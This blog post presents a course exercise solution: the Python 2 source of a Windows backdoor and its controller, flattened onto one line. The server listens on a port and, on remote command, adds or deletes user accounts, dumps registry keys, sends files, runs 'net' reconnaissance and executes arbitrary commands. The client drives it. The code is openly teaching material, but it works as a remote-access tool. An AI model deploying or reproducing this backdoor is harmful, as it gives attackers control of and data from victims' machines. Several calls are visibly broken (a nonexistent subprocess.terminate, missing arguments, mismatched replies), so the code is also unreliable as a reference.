# Solution for Python for Security Professionals on Cybrary # InfoMiner a/k/a Bot -> Server Connector # I. Server Python Program That Binds To Localhost:12345 import subprocess, socket, time, struct from _winreg import * def recv_data(sock): data_len, = struct.unpack("!I",sock.recv(4)) return sock.recv(data_len) def send_data(sock,data): data_len = len(data) sock.send(struct.pack("!I",data_len)) sock.send(data) return def create_user(name,pwd): subprocess.Popen("net user /add " + name + " " + pwd) return def delete_user(name): subprocess.Popen("net user /del " + name) return def download_registry_key(root, path, sock): subkey_list = list() value_dict = dict() root_dict = { "HKEY_CLASSES_ROOT":HKEY_CLASSES_ROOT , "HKEY_CURRENT_USER":HKEY_CURRENT_USER , "HKEY_LOCAL_MACHINE":HKEY_LOCAL_MACHINE , "HKEY_USERS":HKEY_USERS , "HKEY_CURRENT_CONFIG":HKEY_CURRENT_CONFIG} if root in root_dict: root = root_dict[root] else: print "INVALID ROOT KEY" return key_handle = CreateKey(root, path) subkeys,values,lastmodified = QueryInfoKey(key_handle) for i in range(subkeys): subkey_list.append(EnumKey(key_handle,i)) for i in range(values): key,value,last_mod = EnumValue(key_handle,i) value_dict[key] = value send_data(sock,"====================SUBKEYS====================") print "SENT" for i in subkey_list: send_data(sock,i) send_data(sock,"\n\n=====================VALUES====================") print "SENT" for i in value_dict: send_data(sock,i + " : " + str(value_dict[i])) send_data(sock,"DATA_COMPLETE") return def download_file(file_name,sock): f = file(file_name, "r") send_data(sock,f.read()) return def gather_information(log_name,sock): ''' Accounts (Password and account policy data) File (Indicates shared files or folders which are in use) localgroup(list of groups on a machine) session(Display information about sessions on a machine) share (lists all shares from the machine) user (lists users) view (list known computers in the domain) ''' cmd_list = ["net accounts", "net file", "net localgroup", "net session", "net share", "net user", "net view"] f = open(log_name, "w") for cmd in cmd_list: subprocess.Popen(cmd, 0, None, None, f) f.close() download_file(log_name,sock) return def execute_command(cmd): try: running_command = subprocess.Popen(cmd) except WindowsError: running_command = subprocess.Popen(cmd + ".com") subprocess.terminate(running_command) return def get_data(sock, str_to_send): send_data(sock, str_to_send) return recv_data(sock) def main(): listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listen_sock.bind(('',12345)) listen_sock.listen(1) client_sock, client_data = listen_sock.accept() while True: cmd = get_data(client_sock, "COMMAND: ") if cmd == "CU": name = get_data(client_sock,"name: ") pwd = get_data(client_sock,"Password: ") create_user(name, pwd) elif cmd == "DU": name = get_data(client_sock,"Username: ") delete_user(name) elif cmd == "DRK": root = get_data(client_sock,"Root: ") path = get_data(client_sock,"Path: ") download_registry_key(root,path,client_sock) elif cmd == "DF": name = get_data(client_sock,"Filename: ") download_file(name) elif cmd == "GI": name = get_data(client_sock,"Log Name: ") gather_information(name,client_sock) elif cmd == "EC": cmd = get_data(client_sock,"Command to execute: ") execute_command(cmd) return main() ================================================================= # II. Bot Python Program that Connects to Server on Port 12345 import socket, struct from ctypes import * def recv_data(sock): data_len, = struct.unpack("!I",sock.recv(4)) return sock.recv(data_len) def send_data(sock,data): data_len = len(data) sock.send(struct.pack("!I",data_len)) sock.send(data) return def main(): command_list = ["CU" , "DU" , "DRK", "DF" , "GI" , "EC" ] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("127.0.0.1", 12345)) while True: print "COMMANDS:" print "CU - Create User" print "DU - Delete User" print "DRK - Download Registry Key" print "DF - Download File" print "GI - Gather Information" print "EC - Execute Command" cmd = raw_input(recv_data(s)) if cmd == "CU": send_data(s,cmd) send_data(s,raw_input(recv_data(s))) send_data(s,raw_input(recv_data(s))) elif cmd == "DU": send_data(s,cmd) send_data(s,raw_input(recv_data(s))) elif cmd == "DRK": send_data(s,cmd) send_data(s,raw_input(recv_data(s))) send_data(s,raw_input(recv_data(s))) data = recv_data(s) while data != "DATA_COMPLETE": print data data = recv_data(s) elif cmd == "DF": send_data(s,cmd) print recv_data(s) send_data(s,raw_input()) print recv_data(s) elif cmd == "GI": send_data(s,cmd) send_data(s,raw_input(recv_data(s))) print recv_data(s) elif cmd == "EC": send_data(s,cmd) print recv_data(s) send_data(s,raw_input()) print recv_data(s) send_data(s,raw_input()) else: print "INVALID" main()
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
January 2016
Categories |